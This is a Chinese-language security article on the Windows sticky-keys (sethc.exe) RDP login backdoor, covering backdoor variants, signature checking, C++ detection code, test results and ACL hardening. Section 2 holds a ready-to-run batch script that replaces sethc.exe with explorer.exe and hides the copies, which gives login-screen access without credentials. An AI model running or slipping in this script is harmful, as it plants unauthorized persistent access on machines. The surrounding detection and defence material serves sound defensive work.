1. 3389后门种类 2. shift后门部署 3. 数字签名 4. shift后门检测 5. 测试验证 6. shift后门防御策略
1. 3389后门种类
1. windows放大镜后门: %SystemRoot%\system32\magnify.exe 2. windows屏幕键盘后门: %SystemRoot%\system32\osk.exe 3. windows shift后门: %SystemRoot%\system32\sethc.exe
Relevant Link:
2. shift后门部署
@echo off cls echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ echo. echo Shift后门 echo.sproink @copy c:\windows\explorer.exe c:\windows\system32\sethc.exe @copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe @attrib c:\windows\system32\sethc.exe +h @attrib c:\windows\system32\dllcache\sethc.exe +h echo 使用方法:本文件执行完毕后, echo 在终端界面按Shift 5次即可登陆系统! echo. copy c:\windows\explorer.exe c:\windows\system32\sethc.exe echo 完成百分之 50 copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe echo 完成百分之 80 attrib c:\windows\system32\sethc.exe +h echo 完成百分之 90 attrib c:\windows\system32\dllcache\sethc.exe +h echo 完成百分之 100 cls echo. echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ echo 后门安装完毕! echo. echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ echo. echo. & pause exit
Relevant Link:
3. 数字签名
0x1: windows数字签名
0x2: 数字认证码的原理
1. 签名软件对要签名的软件创建hash 2. 使用发布者的私有密匙来加密软件的hash 3. 被加密的hash和发布者的数字证书被插入到要签名的软件
1. 用户对要验证的软件创建hash 2. 使用发布者的公共密匙来解密被加密的hash 3. 比较解密的hash和新获得的hash,如果匹配说明签名是正确的,软件没有被修改过
0x3: 数字签名
1. 数字证书和密码 2. 数字签名工具 3. 时间戳服务器的URL地址
0x4: 数字签名工具
数字签名工具, 微软提供了两套数字签名工具
1. signcode.exe: 从1998年开始使用,随.NET Framework SDK发布 1) signcode.exe: 数字签名工具 2) makecert.exe: 创建数字证书 3) cert2spc.exe: 将数字证书转化为软件发布者证书格式 2. signtool.exe: 随visualstudio 2005及其以后的版本发布 1) signtool.exe: 数字签名工具 2) makecert.exe: 创建数字证书 3) cert2spc.exe: 将数字证书转化为软件发布者证书格式 4) pvk2pfx.exe(pvkimprt.exe): 将私有的密匙和软件发布者证书合并为pfx文件,此文件将被signtool.exe使用
0x5: 数字签名加签代码示例: CryptoAPI
0x6: 数字签名验证代码示例: CryptoAPI
// Includes #include <stdio.h> #include <conio.h> #include <windows.h> #include <wincrypt.h> //需要装PLATFORM SDK #pragma comment (lib, "crypt32.lib") // Defines #define CERT_PERSONAL_STORE_NAME L"My" #define CERT_OTHER_PEOPLE_STORE_NAME L"AddressBook" #define MY_TYPE (PKCS_7_ASN_ENCODING | X509_ASN_ENCODING) #define BUFSIZE 1024 // Local functions void Sign(wchar_t * SignerName, wchar_t * DataFileName, wchar_t * SignatureFileName); void Verify(wchar_t * SignerName, wchar_t * SignatureFileName, wchar_t * DataFileName); // ShowUsageAndExit void ShowUsageAndExit() { wprintf(L"Usage:\n"); wprintf(L" - To sign: SignVerify s signer_name data_file signature_file\n"); wprintf(L" - To verify: SignVerify v signer_name data_file signature_file\n"); wprintf(L"\n<< Press any key to continue >>\n"); _getch(); exit(1); } // End of ShowUsageAndExit // CheckError void CheckError(BOOL condition, wchar_t * message) { wprintf(message); if (condition) { wprintf(L"SUCCESS\n"); } else { // TODO: Some cleanup wprintf(L"FAILURE (0x%x)\n", GetLastError()); wprintf(L"\n<< Press any key to continue >>\n"); _getch(); exit(1); } } // End CheckError // Main void wmain(int argc, wchar_t * argv[]) { // Usage if (argc != 5) { ShowUsageAndExit(); } if (!wcscmp(argv[1], L"s")) { // Sign Sign(argv[2], argv[3], argv[4]); } else if (!wcscmp(argv[1], L"v")) { // Verify Verify(argv[2], argv[3], argv[4]); } else { // Error ShowUsageAndExit(); } // The end wprintf(L"\n<< Press any key to continue >>\n"); _getch(); } // End of main // Sign void Sign(wchar_t * SignerName, wchar_t * DataFileName, wchar_t * SignatureFileName) { // Variables HCERTSTORE hStoreHandle = NULL; PCCERT_CONTEXT pSignerCert = NULL; HCRYPTPROV hCryptProv = NULL; DWORD dwKeySpec = 0; HCRYPTHASH hHash = NULL; HANDLE hDataFile = NULL; BOOL bResult = FALSE; BYTE rgbFile[BUFSIZE]; DWORD cbRead = 0; DWORD dwSigLen = 0; BYTE * pbSignature = NULL; HANDLE hSignatureFile = NULL; DWORD lpNumberOfBytesWritten = 0; wprintf(L"SIGNING\n\n"); // Open the certificate store. hStoreHandle = CertOpenStore( CERT_STORE_PROV_SYSTEM, 0, NULL, CERT_SYSTEM_STORE_CURRENT_USER, CERT_PERSONAL_STORE_NAME ); CheckError((BOOL)hStoreHandle, L"CertOpenStore....................... "); // Get signer's certificate with access to private key. do { // Get a certificate that matches the search criteria pSignerCert = CertFindCertificateInStore( hStoreHandle, MY_TYPE, 0, CERT_FIND_SUBJECT_STR, SignerName, pSignerCert ); CheckError((BOOL)pSignerCert, L"CertFindCertificateInStore.......... "); // Get the CSP, and check if we can sign with the private key bResult = CryptAcquireCertificatePrivateKey( pSignerCert, 0, NULL, &hCryptProv, &dwKeySpec, NULL ); CheckError(bResult, L"CryptAcquireCertificatePrivateKey... "); } while ((dwKeySpec & AT_SIGNATURE) != AT_SIGNATURE); // Create the hash object. bResult = CryptCreateHash( hCryptProv, CALG_MD5, 0, 0, &hHash ); CheckError(bResult, L"CryptCreateHash..................... "); // Open the file with the content to be signed hDataFile = CreateFileW(DataFileName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_FLAG_SEQUENTIAL_SCAN, NULL ); CheckError((hDataFile != INVALID_HANDLE_VALUE), L"CreateFile.......................... "); // Compute the cryptographic hash of the data. while (bResult = ReadFile(hDataFile, rgbFile, BUFSIZE, &cbRead, NULL)) { if (cbRead == 0) { break; } CheckError(bResult, L"ReadFile............................ "); bResult = CryptHashData( hHash, rgbFile, cbRead, 0 ); CheckError(bResult, L"CryptHashData....................... "); } CheckError(bResult, L"ReadFile............................ "); // Sign the hash object dwSigLen = 0; bResult = CryptSignHash( hHash, AT_SIGNATURE, NULL, 0, NULL, &dwSigLen ); CheckError(bResult, L"CryptSignHash....................... "); pbSignature = (BYTE *)malloc(dwSigLen); CheckError((BOOL)pbSignature, L"malloc.............................. "); bResult = CryptSignHash( hHash, AT_SIGNATURE, NULL, 0, pbSignature, &dwSigLen ); CheckError(bResult, L"CryptSignHash....................... "); // Create a file to save the signature hSignatureFile = CreateFileW( SignatureFileName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL ); CheckError((hSignatureFile != INVALID_HANDLE_VALUE), L"CreateFile.......................... "); // Write the signature to the file bResult = WriteFile( hSignatureFile, (LPCVOID)pbSignature, dwSigLen, &lpNumberOfBytesWritten, NULL ); CheckError(bResult, L"WriteFile........................... "); // Clean up and free memory. free(pbSignature); CloseHandle(hDataFile); CloseHandle(hSignatureFile); bResult = CryptDestroyHash(hHash); CheckError(bResult, L"CryptDestroyHash.................... "); bResult = CertFreeCertificateContext(pSignerCert); CheckError(bResult, L"CertFreeCertificateContext.......... "); bResult = CertCloseStore( hStoreHandle, CERT_CLOSE_STORE_CHECK_FLAG ); CheckError(bResult, L"CertCloseStore...................... "); } // End of Sign // Verify void Verify(wchar_t * SignerName, wchar_t * DataFileName, wchar_t * SignatureFileName) { // Variables HCERTSTORE hStoreHandle = NULL; PCCERT_CONTEXT pSignerCert = NULL; DWORD dwKeySpec = 0; HCRYPTPROV hCryptProv = NULL; HCRYPTHASH hHash = NULL; HANDLE hDataFile = NULL; BOOL bResult = FALSE; BYTE rgbFile[BUFSIZE]; DWORD cbRead = 0; HANDLE hSignatureFile = NULL; BYTE * pbBinary = NULL; DWORD cbBinary = 0; HCRYPTKEY hPubKey = NULL; wprintf(L"VERIFYING\n\n"); // Open the certificate store. hStoreHandle = CertOpenStore( CERT_STORE_PROV_SYSTEM, 0, NULL, CERT_SYSTEM_STORE_CURRENT_USER, CERT_PERSONAL_STORE_NAME ); CheckError((BOOL)hStoreHandle, L"CertOpenStore....................... "); // Get a certificate that matches the search criteria pSignerCert = CertFindCertificateInStore( hStoreHandle, MY_TYPE, 0, CERT_FIND_SUBJECT_STR, SignerName, pSignerCert ); CheckError((BOOL)pSignerCert, L"CertFindCertificateInStore.......... "); // Get the CSP bResult = CryptAcquireContext( &hCryptProv, NULL, NULL, PROV_RSA_FULL, CRYPT_VERIFYCONTEXT ); CheckError(bResult, L"CryptAcquireContext................. "); // Create the hash object. bResult = CryptCreateHash( hCryptProv, CALG_MD5, 0, 0, &hHash ); CheckError(bResult, L"CryptCreateHash..................... "); // Open the file with the content that was signed. hDataFile = CreateFileW( DataFileName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_FLAG_SEQUENTIAL_SCAN, NULL ); CheckError((hDataFile != INVALID_HANDLE_VALUE), L"CreateFile.......................... "); // Compute the cryptographic hash of the data. while (bResult = ReadFile(hDataFile, rgbFile, BUFSIZE, &cbRead, NULL)) { if (cbRead == 0) { break; } CheckError(bResult, L"ReadFile............................ "); bResult = CryptHashData( hHash, rgbFile, cbRead, 0 ); CheckError(bResult, L"CryptHashData....................... "); } CheckError(bResult, L"ReadFile............................ "); // Open the file with the signature hSignatureFile = CreateFileW( SignatureFileName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_FLAG_SEQUENTIAL_SCAN, NULL ); CheckError((hSignatureFile != INVALID_HANDLE_VALUE), L"CreateFile.......................... "); // Read the signature from the file pbBinary = (BYTE *)malloc(BUFSIZE); CheckError((BOOL)pbBinary, L"malloc.............................. "); bResult = ReadFile(hSignatureFile, pbBinary, BUFSIZE, &cbBinary, NULL); CheckError(bResult, L"ReadFile............................ "); // Get the public key from the certificate CryptImportPublicKeyInfo( hCryptProv, MY_TYPE, &pSignerCert->pCertInfo->SubjectPublicKeyInfo, &hPubKey ); CheckError(bResult, L"CryptImportPublicKeyInfo............ "); // Verify the signature bResult = CryptVerifySignature( hHash, pbBinary, cbBinary, hPubKey, NULL, 0 ); CheckError(bResult, L"CryptVerifySignature................ "); // Clean up and free memory. free(pbBinary); CloseHandle(hDataFile); CloseHandle(hSignatureFile); bResult = CryptDestroyHash(hHash); CheckError(bResult, L"CryptDestroyHash.................... "); bResult = CertFreeCertificateContext(pSignerCert); CheckError(bResult, L"CertFreeCertificateContext.......... "); bResult = CertCloseStore( hStoreHandle, CERT_CLOSE_STORE_CHECK_FLAG ); CheckError(bResult, L"CertCloseStore...................... "); bResult = CryptReleaseContext( hCryptProv, 0 ); CheckError(bResult, L"CryptReleaseContext................. "); } // End of Verify
Relevant Link:
4. shift后门检测
0x1: 检测思路
1. 检查%SystemRoot%\system32\sethc.exe文件是否包含windows合法签名 2. 检查%SystemRoot%\system32\sethc.exe文件是否包含正常setth程序的二进制特征码
0x2: Code Example
// AliHealthExamination.cpp : 定义控制台应用程序的入口点。 // #include <io.h> #include <fstream> #include <iostream> #include <string> #include "Cverify.h" #include "JsonEasy.h" using namespace std; #pragma comment(lib,"lib_json") #pragma comment(lib, "version.lib") char* TCHAR2char(TCHAR* tchStr) { int iLen = 2 * wcslen(tchStr);//CString,TCHAR汉字算一个字符,因此不用普通计算长度 char * chRtn = new char[iLen+1]; wcstombs(chRtn, tchStr, iLen+1);//转换成功返回为非负值 return chRtn; } HRESULT FileBinaryCheck(TCHAR exeName[], JsonEasy & JsonResult) { int Bresult_sethc = -1, Bresult_osk = -1, Bresult_magnify = -1; int temResult_magnify, temResult_screenmagnifier; DWORD dwSize; DWORD dwRtn; //file ersion info TCHAR* szVersion; CString csVersion; //get the size of version info dwSize = GetFileVersionInfoSize(exeName, NULL); if (dwSize == 0) { //在windows server 2003、2008、windows7上屏幕放大键的程序名是不同的,当传入错误的程序名时,这里会打开失败而自动退出 return E_FAIL; } char *pBuf; pBuf = new char[dwSize + 1]; if(pBuf == NULL) { return E_FAIL; } memset(pBuf, 0, dwSize + 1); //get file version information dwRtn = GetFileVersionInfo(exeName ,NULL, dwSize, pBuf); if(dwRtn == 0) { return E_FAIL; } LPVOID lpBuffer = NULL; UINT uLen = 0; //pBuf: Pointer to a buffer that receives the file-version information. //Retrieves specified version information from the specified version-information resource. dwRtn = VerQueryValue(pBuf, TEXT("\\StringFileInfo\\080404b0\\OriginalFilename"), //0804: 中文、04b0: 1252ANSI //可以测试的属性 /* CompanyName FileDescription FileVersion InternalName LegalCopyright OriginalFilename ProductName ProductVersion Comments LegalTrademarks PrivateBuild SpecialBuild */ &lpBuffer, &uLen); if(dwRtn == 0) { return E_FAIL; } //get output //这里获得的文件名可能magnify.exe、screenmagnifier.exe szVersion = (TCHAR*)lpBuffer; //check result(对magnify单独做特殊处理) csVersion = (CString)szVersion; csVersion.MakeLower(); CString ssExeName( exeName ); if(ssExeName.Find(_T("sethc.exe")) != -1 ) { JsonResult.execinfoItemSethc["binarycoderesult"] = TCHAR2char(szVersion); Bresult_sethc = csVersion.Find(_T("sethc.exe")); } else if(ssExeName.Find(_T("osk.exe")) != -1 ) { JsonResult.execinfoItemOsk["binarycoderesult"] = TCHAR2char(szVersion); Bresult_osk = csVersion.Find(_T("osk.exe")); } //else if(ssExeName.CompareNoCase(_T("magnifier.exe")) == 0 || ssExeName.CompareNoCase(_T("magnify.exe")) == 0 ) else if(ssExeName.Find(_T("magnify.exe")) != -1 ) { JsonResult.execinfoItemMagnify["binarycoderesult"] = TCHAR2char(szVersion); temResult_magnify = csVersion.Find(_T("magnify.exe")); temResult_screenmagnifier = csVersion.Find(_T("screenmagnifier.exe")); Bresult_magnify = ( (temResult_magnify != -1) || (temResult_screenmagnifier != -1) ) ? 1 : -1; } if( (Bresult_sethc != -1) || (Bresult_osk != -1) || (Bresult_magnify != -1) ) { return S_OK; } else { return E_FAIL; } } HRESULT SignatureCheck(TCHAR exePath[], JsonEasy & JsonResult) { //sigName: signature name CStdString sigName; CString csExePath; //new CFileDigitalSignVerify CFileDigitalSignVerify fileVerifySign = CFileDigitalSignVerify(); //verify the sethc fileSign VERIFY_RESULT signResult = fileVerifySign.VerifyFileBySmartMode(exePath, sigName); //如果用户对sethc.exe、osk.exe、magnify.exe进行了加固,则直接判定为正常 //get the sign info json csExePath = (CString)exePath; if(csExePath.Find(_T("sethc.exe")) != -1) { JsonResult.execinfoItemSethc["exename"] = TCHAR2char(exePath); JsonResult.execinfoItemSethc["signcheckresult"] = TCHAR2char((TCHAR*)sigName.GetData()); JsonResult.execinfoItemSethc["trustcheckresult"] = signResult == 0 ? "VrUnknown" : signResult == 1 ? "VrNoSignature" : signResult == 2 ? "VrTrusted" : signResult == 3 ? "VrExpired" : signResult == 4 ? "VrRevoked" : signResult == 5 ? "VrDistrust" : signResult == 6 ? "VrSecuritySettings" : ""; } else if(csExePath.Find(_T("osk.exe")) != -1) { JsonResult.execinfoItemOsk["exename"] = TCHAR2char(exePath); JsonResult.execinfoItemOsk["signcheckresult"] = TCHAR2char((TCHAR*)sigName.GetData()); JsonResult.execinfoItemOsk["trustcheckresult"] = signResult == 0 ? "VrUnknown" : signResult == 1 ? "VrNoSignature" : signResult == 2 ? "VrTrusted" : signResult == 3 ? "VrExpired" : signResult == 4 ? "VrRevoked" : signResult == 5 ? "VrDistrust" : signResult == 6 ? "VrSecuritySettings" : ""; } else if(csExePath.Find(_T("magnify.exe")) != -1) { JsonResult.execinfoItemMagnify["exename"] = TCHAR2char(exePath); JsonResult.execinfoItemMagnify["signcheckresult"] = TCHAR2char((TCHAR*)sigName.GetData()); JsonResult.execinfoItemMagnify["trustcheckresult"] = signResult == 0 ? "VrUnknown" : signResult == 1 ? "VrNoSignature" : signResult == 2 ? "VrTrusted" : signResult == 3 ? "VrExpired" : signResult == 4 ? "VrRevoked" : signResult == 5 ? "VrDistrust" : signResult == 6 ? "VrSecuritySettings" : ""; } //Microsoft versign CString csSigName = CString((TCHAR*)sigName.GetData()); int vResult = csSigName.Find(L"O=Microsoft Corporation"); if(vResult != -1) { if(signResult == 2) { //VrTrusted return S_OK; } else { //NOT VrTrusted return E_FAIL; } } else { return E_FAIL; } } int main(int argc, char* argv[]) { //parameter check std::string action; if (argc <= 1) { std::cout << "usage: " << argv[0] << " --suspicion-account" << std::endl; return 0; } else { action = argv[1]; } //main func if (action == "--suspicion-account") { } else if (action == "--port-scan") { } else if (action == "--system-vulscan") { } else if(action == "--3389-backdoor") { JsonEasy JsonResult = JsonEasy(); //check sign TCHAR sethcPath[MAX_PATH] = _T(""); TCHAR oskPath[MAX_PATH] = _T(""); TCHAR magnifyPath[MAX_PATH] = _T(""); //get system32 path TCHAR lpszFileFullPath[MAX_PATH]; GetSystemDirectory(lpszFileFullPath, sizeof(lpszFileFullPath)); lstrcat(lpszFileFullPath, _T("\\")); //lpszFileFullPath = %SystemRoot%\system32\sethc.exe lstrcat(sethcPath, lpszFileFullPath); lstrcat(sethcPath, _T("sethc.exe")); //lpszFileFullPath = %SystemRoot%\system32\osk.exe lstrcat(oskPath, lpszFileFullPath); lstrcat(oskPath, _T("osk.exe")); //lpszFileFullPath = %SystemRoot%\system32\magnify.exe lstrcat(magnifyPath, lpszFileFullPath); lstrcat(magnifyPath, _T("magnify.exe")); { //which hava read permission, go on //SignatureCheck result: S_OK or E_FAIL HRESULT SresultSethc = SignatureCheck(sethcPath, JsonResult); HRESULT SresultOsk = SignatureCheck(oskPath, JsonResult); HRESULT SresultMagnify = SignatureCheck(magnifyPath, JsonResult); //may be angly if(SresultSethc == S_OK) { if(SresultOsk == S_OK) { if(SresultMagnify == S_OK) { //if SignatureCheck is ok, then we go on //certificate check is ok, go on binary characteristics //if the program contains correct binary program name,then ok HRESULT BresultSethc = FileBinaryCheck(sethcPath, JsonResult); HRESULT BresultOsk = FileBinaryCheck(oskPath, JsonResult); HRESULT BresultMagnify = FileBinaryCheck(magnifyPath, JsonResult); if(BresultSethc == S_OK && BresultOsk == S_OK && BresultMagnify == S_OK ) { JsonResult.jRoot["isvul"] = 0; } else { JsonResult.jRoot["isvul"] = 1; } } else { //std::wcout << "JsonResult.execinfoItemMagnify: " << JsonResult.execinfoItemMagnify["signcheckresult"].empty() << std::endl; //magnify.exe //check target is if accessable if ( JsonResult.execinfoItemMagnify["signcheckresult"].empty() == 0 ) { JsonResult.jRoot["isvul"] = 0; JsonResult.execinfoItemMagnify["exename"] = TCHAR2char(magnifyPath); JsonResult.execinfoItemMagnify["signcheckresult"] = "CN=Microsoft Windows Component Publisher, O=Microsoft Corporation, L=Redmond, S=Washington, C=US"; JsonResult.execinfoItemMagnify["trustcheckresult"] = "VrTrusted"; JsonResult.execinfoItemMagnify["binarycoderesult"] = "Target Program Has Been Reinforcemented"; } else { JsonResult.jRoot["isvul"] = 1; } } } else { //osk.exe //check target is if accessable if ( JsonResult.execinfoItemOsk["signcheckresult"].empty() == 0 ) { JsonResult.jRoot["isvul"] = 0; JsonResult.execinfoItemOsk["exename"] = TCHAR2char(oskPath); JsonResult.execinfoItemOsk["signcheckresult"] = "CN=Microsoft Windows Component Publisher, O=Microsoft Corporation, L=Redmond, S=Washington, C=US"; JsonResult.execinfoItemOsk["trustcheckresult"] = "VrTrusted"; JsonResult.execinfoItemOsk["binarycoderesult"] = "Target Program Has Been Reinforcemented"; } else { JsonResult.jRoot["isvul"] = 1; } } } else { //sethc.exe //check target is if accessable if ( JsonResult.execinfoItemSethc["signcheckresult"].empty() == 0 ) { //no read permission JsonResult.jRoot["isvul"] = 0; JsonResult.execinfoItemSethc["exename"] = TCHAR2char(sethcPath); JsonResult.execinfoItemSethc["signcheckresult"] = "CN=Microsoft Windows Component Publisher, O=Microsoft Corporation, L=Redmond, S=Washington, C=US"; JsonResult.execinfoItemSethc["trustcheckresult"] = "VrTrusted"; JsonResult.execinfoItemSethc["binarycoderesult"] = "Target Program Has Been Reinforcemented"; } else { JsonResult.jRoot["isvul"] = 1; } } } //wrapper protocol JsonResult.jRoot["moduleid"] = 1; JsonResult.jRoot["execresult"] = 1; JsonResult.execinfoArrayObj.append(JsonResult.execinfoItemSethc); JsonResult.execinfoArrayObj.append(JsonResult.execinfoItemOsk); JsonResult.execinfoArrayObj.append(JsonResult.execinfoItemMagnify); JsonResult.jRoot["execinfo"] = JsonResult.execinfoArrayObj; //output finnal result std::string out = JsonResult.jRoot.toStyledString(); std::cout << out << std::endl; } return 0; }
1. 在windows7、windows server 2003、windows server 2012系统上,屏幕放大器的程序名都是magnify.exe,但是原始程序名是不同的,可能有magnify.exe、screenmagnifier.exe,在检测程序中需要做兼容 2. 如果采取了对sethc.exe、osk.exe、magnify.exe的加固(设置everyone完全拒绝),则程序无法正常获取到目标程序的版本信息,在检测程序中需要做兼容 3. 如果目标程序无法读取,即无法正常获取程序签名、版本信息,则假定目标程序为正常: 最小误判原则 4. sethc.exe、osk.exe、magnify.exe中同时出现 1) 程序被替换 2) everyone权限被取消 则需要单独标记出来
1. 如果因为NTFS ACL权限问题获取不到目标进程的签名和版本信息,则认定目标进程也无法被黑客用来进行shift后门运行登录,因为只有程序可读/可执行,这个shift后门才本质存在 2. 在NTFS ACL权限正常的情况下,不管是"copy explorer"、还是"copy virus"的shift后门部署方式,签名+二进制版本信息特征的逻辑都能正常检测出来
0x1: System32,Syswow64的区别
1. "WOW64"的意思是"Windows On Windows64" 2. 在32bit下,system32里保存的是32bit的程序 3. 在64bit下,system32里保存的是64bit的程序,SysWOW64里保存的是32bit的程序 4. 32位软件并不能在64位系统中直接运行,所以微软设计了WoW64(Windows-on-Windows 64-bit),通过Wow64.dll、Wow64win.dll、Wow64cpu.dl三个DLL文件进行32位和64位系统的切换来运行32位软件
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5. 测试验证
1. windows server 2003: 未部署shift后门/部署shift后门,检测程序均工作正常 2. windows server 2008: 未部署shift后门/部署shift后门,检测程序均工作正常 3. windows server 2012: 未部署shift后门/部署shift后门,检测程序均工作正常 4. 32bit操作系统下测试通过
6. shift后门防御策略
0x1: 拒绝使用sethc.exe
1. 首先找到C:\WINDOWS\system32、C:\WINDOWS\system32\dllcache下的seth.exe。 2. 删除所有文件安全设置下的用户,将"Everyone的权限"列表框中的选项,全部勾选"拒绝"复选框
0x2: 禁用Shift键
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